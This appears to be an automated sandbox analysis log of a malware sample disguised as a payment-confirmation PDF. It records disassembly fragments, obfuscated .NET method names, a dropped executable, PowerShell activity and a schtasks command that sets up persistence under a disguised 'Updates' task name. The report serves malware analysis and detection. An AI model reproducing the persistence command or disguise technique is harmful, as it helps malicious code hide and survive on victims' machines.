                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040853F push eax; retf 10_2_00408556
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00411E5F push 00000077h; iretd 10_2_00411E61
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014209AD push ecx; mov dword ptr [esp], ecx10_2_014209B6
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeCode function: 11_2_0186EFB0 push esp; iretd 11_2_0186EFB1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0118C54D pushfd ; ret 17_2_0118C54E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0118C54F push 8B011167h; ret 17_2_0118C554
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_011409AD push ecx; mov dword ptr [esp], ecx17_2_011409B6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0118C9D7 push edi; ret 17_2_0118C9D9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01111FEC push eax; iretd 17_2_01111FED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01197E99 push ecx; ret 17_2_01197EAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0042E57F pushad ; ret 17_2_0042E580
                      Source: Payment_Confirmation_pdf.exeStatic PE information: section name: .text entropy: 7.66363017602626
                      Source: cQwRvD.exe.0.drStatic PE information: section name: .text entropy: 7.66363017602626
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, ELE585f2q8cgK7WX9k.csHigh entropy of concatenated method names: 'iPTEiAKVJ8', 'hV9EddxipL', 'TniEcWDmnb', 'HniceSViKn', 'gy5czeVs0n', 'a8eEvU5N2s', 'AuAEupf7i3', 'wWjEa61tOy', 'QWAEJIJ9an', 'Hb2EM7xlmo'
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, QQh4v6ItHd5GNRwOyW.csHigh entropy of concatenated method names: 'rU7cSNXd89', 'D1OcsBEIeL', 'UrgcgwuNpe', 'Mh7cEMVbrt', 'FEkcKJhNJA', 'yIZg5HD6kK', 'SvegZVO5qt', 'iBggLUVJ8C', 'knIgqDBF7R', 'tfogCtwkA5'
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, fsUapYuvnnqai8nBi2g.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dLJm76jjb5', 'xWPmOGJ7pq', 'EBSmRZNtFR', 'lt6mFRXqvs', 'uSYm3AjYZT', 'FYImAqqmie', 'UkDmbtgAWh'
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, b8CuA5A1Ej1kCR6T83.csHigh entropy of concatenated method names: 'ToString', 'qBIY7Feavn', 'NrVYhJjEwP', 'P7uYVjt12s', 'w4MYBZmx9n', 'mXBYo7WvYf', 'g3tYlnMjru', 'DqBYfcif5H', 'wBdYT2jCTi', 'LErYDdkSme'
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, UVSPe1HaZ7PT1moVSI.csHigh entropy of concatenated method names: 'JBQsFFwi13', 'Emks3yamVi', 'YxDsAvLEiC', 'gaPsbJDuJR', 'Yo8s5yQ4jI', 'CMisZZryph', 'ucusLAdCiZ', 'iXvsqKQbL3', 'UMesCIMSe2', 'VJ8seR2aBv'
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, vqi9Pba9LKgBvs3XmW.csHigh entropy of concatenated method names: 'lniNGnlGl', 'N6B6Co2G2', 'wbE9nae4e', 'SPHGNnBOs', 'Krftyl0Jw', 'hbgUhtA7r', 'zw47NjZvwcDJmKPKNN', 'qL5ek7tSGRTFa9S3lX', 'hRF0pPhOm', 'wNBmijvEc'
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, f3MFcjb1UuWf1Kxdqn.csHigh entropy of concatenated method names: 'lQ6Q1Hya7i', 'TAZQnVa3X2', 'ToString', 'rCJQii9qbY', 'lD8Qsqy1Vx', 'ygeQdShEgJ', 'LlpQgirbns', 'SraQcBQi0k', 'gdeQEAPcvU', 'mhBQKdsGq6'
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, UNdLi7t3xRIuFbLkqe.csHigh entropy of concatenated method names: 'LOBd6b587X', 'kJKd9i1HdB', 'BxBdH3MIqU', 'RQwdtavcvF', 'B3GdxLFmki', 'HhndY7VKrC', 'wWldQ2yY0U', 'zYVd03e02B', 'ugkdW5kmvj', 'YYMdmxlKEN'
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, FOSDR9uMmZdRc4nkBuK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LGPjWLOotw', 'WatjmMrVUu', 'dp4j4LUOTa', 'Eucjjr6oPo', 'z5AjrMLVRW', 'wtnjyh2Gaj', 'tCXjP1jNcr'
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, UUYgd3F10soYVsFNxD.csHigh entropy of concatenated method names: 'N7Yx8uh1nS', 'EcOxOKB8NS', 'nNuxFvDSCo', 'Y3qx3Zm9Pe', 'BVexhKbpvi', 'qO9xV0nsvs', 'UmixBEb8g2', 'DF5xoKJjTc', 'RhUxlFPsOa', 'm0qxfcLf0X'
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, XZoroxKebvtGCIPa9b.csHigh entropy of concatenated method names: 'bgyJS3mQDq', 'X9SJi8shuy', 'h7wJsAFvO5', 'HxTJdl21Fr', 'RcYJgWVB4K', 'pp1JccciNo', 'fWIJEZughq', 'PqCJKXTCpI', 'vYdJpZdo2n', 'MCsJ1RGYVJ'
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, vJ3WjfU3Ncg3pRa5LK.csHigh entropy of concatenated method names: 'fotgwbOhjZ', 'LhUgG2epyA', 'OYhdVoN4Po', 'z4BdB5BvoY', 'wO6doweoKH', 'vZJdl0sJBR', 'Q3vdfajJvv', 'BtTdTDfysu', 'DUCdDeNbDd', 'jHod8OtGkr'
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, e9AOGdzqSq6m1Vq6pv.csHigh entropy of concatenated method names: 'zvQm9Ro5fP', 'XOgmHmH2V1', 'nDjmtE88M8', 'bWlmIb7CxW', 'Il1mhuwlW8', 'FCLmB6CBrG', 'iLBmoQoXRL', 'cK6mP0Z7B9', 'MvMmk6qIvp', 'A78m2Dr8mV'
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, Ry3gg7Lm4SYmmjSxUn.csHigh entropy of concatenated method names: 'gANWxYRdSk', 'rhQWQJICZB', 'yL6WWxDDmO', 'T27W4RN3Ho', 'JL0WrB6EXM', 'FjkWPPjlnS', 'Dispose', 'rjW0ipHwxa', 'aa10so6c2K', 'prd0dvEGx8'
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, Ar2lcAsu02n7qBEetI.csHigh entropy of concatenated method names: 'Dispose', 'eYmuCmjSxU', 'TTNahTTuEC', 'Vgbvjq6U6P', 'm1EueGJQcL', 'P9xuzFyWac', 'ProcessDialogKey', 'PWxavtvqG7', 'qyEauKaDU3', 'YsnaaLb89O'
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, otvqG7C0yEKaDU3esn.csHigh entropy of concatenated method names: 'RSXWIA7ls3', 'IswWhhIkqP', 'elCWVOmrdA', 'jFhWBRrjCc', 'koNWoByDjV', 'sKpWlYOqeY', 'IHOWfs0E6a', 'sv4WT35pPX', 'rxpWDwC3K3', 'Wa0W88XLoO'
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, OF1LvyM5IfVAyaR4i4.csHigh entropy of concatenated method names: 'IG5uEVSPe1', 'cZ7uKPT1mo', 'O3xu1RIuFb', 'VkqunerJ3W', 'Qa5uxLKFQh', 'tv6uYtHd5G', 'oBRVVDUK6nfy5dFSKx', 'slDZcTIcf8cOmd42P8', 'MtYl4dMc61HohH9kFh', 'XuRuuqyPox'
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, mMVc1wRctYQGJyxEYr.csHigh entropy of concatenated method names: 'RYgXHTLX2n', 'nABXtwmrmk', 'vN3XIledYh', 'kY5XhEp7p6', 'VgyXBhanSX', 'USHXoosZKF', 'zd1Xf73oOO', 'JuOXTWA7jL', 'Y3OX84t87m', 'FQwX7PThAm'
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, V35lQEuuVg1mELYWok2.csHigh entropy of concatenated method names: 'PXumeOXlxu', 'Pc7mzFurvp', 'Aun4v09TDH', 'CNn4uWJKqN', 'yeo4aU1HCm', 'sMK4JCHAPP', 'vHj4Mq79Mo', 'qUR4SNTWma', 'Xrw4isvy4w', 'r3u4sHoAni'
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, SbcD8nDaAr6P45q4Kn.csHigh entropy of concatenated method names: 'mglEkZr34q', 'vpAE256dB5', 'WUEENPr7yp', 'DYVE6QbUb5', 'orDEw0rqf5', 'soeE9cZ7dH', 'P3NEGaBNQi', 'YvdEH84Ihe', 'KUBEtuGd3n', 'J7EEUTC9iT'
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, ELE585f2q8cgK7WX9k.csHigh entropy of concatenated method names: 'iPTEiAKVJ8', 'hV9EddxipL', 'TniEcWDmnb', 'HniceSViKn', 'gy5czeVs0n', 'a8eEvU5N2s', 'AuAEupf7i3', 'wWjEa61tOy', 'QWAEJIJ9an', 'Hb2EM7xlmo'
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, QQh4v6ItHd5GNRwOyW.csHigh entropy of concatenated method names: 'rU7cSNXd89', 'D1OcsBEIeL', 'UrgcgwuNpe', 'Mh7cEMVbrt', 'FEkcKJhNJA', 'yIZg5HD6kK', 'SvegZVO5qt', 'iBggLUVJ8C', 'knIgqDBF7R', 'tfogCtwkA5'
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, fsUapYuvnnqai8nBi2g.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dLJm76jjb5', 'xWPmOGJ7pq', 'EBSmRZNtFR', 'lt6mFRXqvs', 'uSYm3AjYZT', 'FYImAqqmie', 'UkDmbtgAWh'
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, b8CuA5A1Ej1kCR6T83.csHigh entropy of concatenated method names: 'ToString', 'qBIY7Feavn', 'NrVYhJjEwP', 'P7uYVjt12s', 'w4MYBZmx9n', 'mXBYo7WvYf', 'g3tYlnMjru', 'DqBYfcif5H', 'wBdYT2jCTi', 'LErYDdkSme'
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, UVSPe1HaZ7PT1moVSI.csHigh entropy of concatenated method names: 'JBQsFFwi13', 'Emks3yamVi', 'YxDsAvLEiC', 'gaPsbJDuJR', 'Yo8s5yQ4jI', 'CMisZZryph', 'ucusLAdCiZ', 'iXvsqKQbL3', 'UMesCIMSe2', 'VJ8seR2aBv'
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, vqi9Pba9LKgBvs3XmW.csHigh entropy of concatenated method names: 'lniNGnlGl', 'N6B6Co2G2', 'wbE9nae4e', 'SPHGNnBOs', 'Krftyl0Jw', 'hbgUhtA7r', 'zw47NjZvwcDJmKPKNN', 'qL5ek7tSGRTFa9S3lX', 'hRF0pPhOm', 'wNBmijvEc'
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, f3MFcjb1UuWf1Kxdqn.csHigh entropy of concatenated method names: 'lQ6Q1Hya7i', 'TAZQnVa3X2', 'ToString', 'rCJQii9qbY', 'lD8Qsqy1Vx', 'ygeQdShEgJ', 'LlpQgirbns', 'SraQcBQi0k', 'gdeQEAPcvU', 'mhBQKdsGq6'
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, UNdLi7t3xRIuFbLkqe.csHigh entropy of concatenated method names: 'LOBd6b587X', 'kJKd9i1HdB', 'BxBdH3MIqU', 'RQwdtavcvF', 'B3GdxLFmki', 'HhndY7VKrC', 'wWldQ2yY0U', 'zYVd03e02B', 'ugkdW5kmvj', 'YYMdmxlKEN'
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, FOSDR9uMmZdRc4nkBuK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LGPjWLOotw', 'WatjmMrVUu', 'dp4j4LUOTa', 'Eucjjr6oPo', 'z5AjrMLVRW', 'wtnjyh2Gaj', 'tCXjP1jNcr'
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, UUYgd3F10soYVsFNxD.csHigh entropy of concatenated method names: 'N7Yx8uh1nS', 'EcOxOKB8NS', 'nNuxFvDSCo', 'Y3qx3Zm9Pe', 'BVexhKbpvi', 'qO9xV0nsvs', 'UmixBEb8g2', 'DF5xoKJjTc', 'RhUxlFPsOa', 'm0qxfcLf0X'
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, XZoroxKebvtGCIPa9b.csHigh entropy of concatenated method names: 'bgyJS3mQDq', 'X9SJi8shuy', 'h7wJsAFvO5', 'HxTJdl21Fr', 'RcYJgWVB4K', 'pp1JccciNo', 'fWIJEZughq', 'PqCJKXTCpI', 'vYdJpZdo2n', 'MCsJ1RGYVJ'
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, vJ3WjfU3Ncg3pRa5LK.csHigh entropy of concatenated method names: 'fotgwbOhjZ', 'LhUgG2epyA', 'OYhdVoN4Po', 'z4BdB5BvoY', 'wO6doweoKH', 'vZJdl0sJBR', 'Q3vdfajJvv', 'BtTdTDfysu', 'DUCdDeNbDd', 'jHod8OtGkr'
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, e9AOGdzqSq6m1Vq6pv.csHigh entropy of concatenated method names: 'zvQm9Ro5fP', 'XOgmHmH2V1', 'nDjmtE88M8', 'bWlmIb7CxW', 'Il1mhuwlW8', 'FCLmB6CBrG', 'iLBmoQoXRL', 'cK6mP0Z7B9', 'MvMmk6qIvp', 'A78m2Dr8mV'
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, Ry3gg7Lm4SYmmjSxUn.csHigh entropy of concatenated method names: 'gANWxYRdSk', 'rhQWQJICZB', 'yL6WWxDDmO', 'T27W4RN3Ho', 'JL0WrB6EXM', 'FjkWPPjlnS', 'Dispose', 'rjW0ipHwxa', 'aa10so6c2K', 'prd0dvEGx8'
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, Ar2lcAsu02n7qBEetI.csHigh entropy of concatenated method names: 'Dispose', 'eYmuCmjSxU', 'TTNahTTuEC', 'Vgbvjq6U6P', 'm1EueGJQcL', 'P9xuzFyWac', 'ProcessDialogKey', 'PWxavtvqG7', 'qyEauKaDU3', 'YsnaaLb89O'
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, otvqG7C0yEKaDU3esn.csHigh entropy of concatenated method names: 'RSXWIA7ls3', 'IswWhhIkqP', 'elCWVOmrdA', 'jFhWBRrjCc', 'koNWoByDjV', 'sKpWlYOqeY', 'IHOWfs0E6a', 'sv4WT35pPX', 'rxpWDwC3K3', 'Wa0W88XLoO'
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, OF1LvyM5IfVAyaR4i4.csHigh entropy of concatenated method names: 'IG5uEVSPe1', 'cZ7uKPT1mo', 'O3xu1RIuFb', 'VkqunerJ3W', 'Qa5uxLKFQh', 'tv6uYtHd5G', 'oBRVVDUK6nfy5dFSKx', 'slDZcTIcf8cOmd42P8', 'MtYl4dMc61HohH9kFh', 'XuRuuqyPox'
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, mMVc1wRctYQGJyxEYr.csHigh entropy of concatenated method names: 'RYgXHTLX2n', 'nABXtwmrmk', 'vN3XIledYh', 'kY5XhEp7p6', 'VgyXBhanSX', 'USHXoosZKF', 'zd1Xf73oOO', 'JuOXTWA7jL', 'Y3OX84t87m', 'FQwX7PThAm'
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, V35lQEuuVg1mELYWok2.csHigh entropy of concatenated method names: 'PXumeOXlxu', 'Pc7mzFurvp', 'Aun4v09TDH', 'CNn4uWJKqN', 'yeo4aU1HCm', 'sMK4JCHAPP', 'vHj4Mq79Mo', 'qUR4SNTWma', 'Xrw4isvy4w', 'r3u4sHoAni'
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, SbcD8nDaAr6P45q4Kn.csHigh entropy of concatenated method names: 'mglEkZr34q', 'vpAE256dB5', 'WUEENPr7yp', 'DYVE6QbUb5', 'orDEw0rqf5', 'soeE9cZ7dH', 'P3NEGaBNQi', 'YvdEH84Ihe', 'KUBEtuGd3n', 'J7EEUTC9iT'
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeFile created: C:\Users\user\AppData\Roaming\cQwRvD.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
